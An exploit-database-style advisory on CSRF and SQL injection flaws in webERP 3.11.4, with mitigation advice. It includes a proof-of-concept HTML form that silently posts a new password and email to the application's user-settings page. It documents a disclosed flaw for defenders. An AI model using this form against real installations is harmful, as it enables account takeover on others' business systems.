header-logo
Suggest Exploit
vendor:
webERP
by:
ADEO Security
8,8
CVSS
HIGH
CSRF and SQL Injection
352, 89
CWE
Product Name: webERP
Affected Version From: 3.11.4
Affected Version To: Possible all versions
Patch Exists: NO
Related CWE: N/A
CPE: //a:weberp:weberp
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

webERP Multiple Vulnerabilities

webERP is a complete web based accounting/ERP system that requires only a web-browser and pdf reader to use. Attacker can add new administrator to the system by exploiting the CSRF vulnerability. Application offer disable the magic_quotes_gpc. Attacker can inject sql codes if exploit the CSRF vulnerability. HTTP Requests must filtered.

Mitigation:

Enable magic_quotes_gpc and filter HTTP requests.
Source

Exploit-DB raw data:

# Title: webERP Multiple Vulnerabilities
# Author: ADEO Security
# Published: 30/06/2010
# Version: 3.11.4 (Possible all versions)
# Vendor: http://www.weberp.org

# Description: "webERP is a complete web based accounting/ERP system
that requires only a web-browser and pdf reader to use. It has a wide
range of features suitable for many businesses particularly
distributed businesses in wholesale and distribution. It is developed
as an open-source application and is available as a free download to
use. The feature set is continually expanding as new businesses and
developers adopt it.There are on average 5,000 downloads per month."

# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
- Mail: security[AT]adeo.com.tr
- Web: http://security.adeo.com.tr

# Vulnerabilities:
1) CSRF: Attacker can add new administrator to the system. All files
have this issue. See #PoC section.
2) SQL Injection: Application offer disable the magic_quotes_gpc.
Attacker can inject sql codes if exploit the CSRF vulnerability. HTTP
Requests must filtered.

# PoC (CSRF):
<html>
<body>
<form method="POST" action="http://server/UserSettings.php?">
<input type="hidden" name="RealName" VALUE="ADEO-Security">
<input type='hidden' name='DisplayRecordsMax' VALUE="10">
<input type='hidden' name='Language' VALUE='en_US'>
<input type='hidden' name='Theme' VALUE='green'>
<input type='hidden' name='pass' value='adeopass'>
<input type='hidden' name='passcheck' value='adeopass'>
<input type='hidden' name='email' size=40 value='hacked@weberp.org'>
<input type='hidden' name='Modify' value="Modify""></div>
</form>

</body>
</html>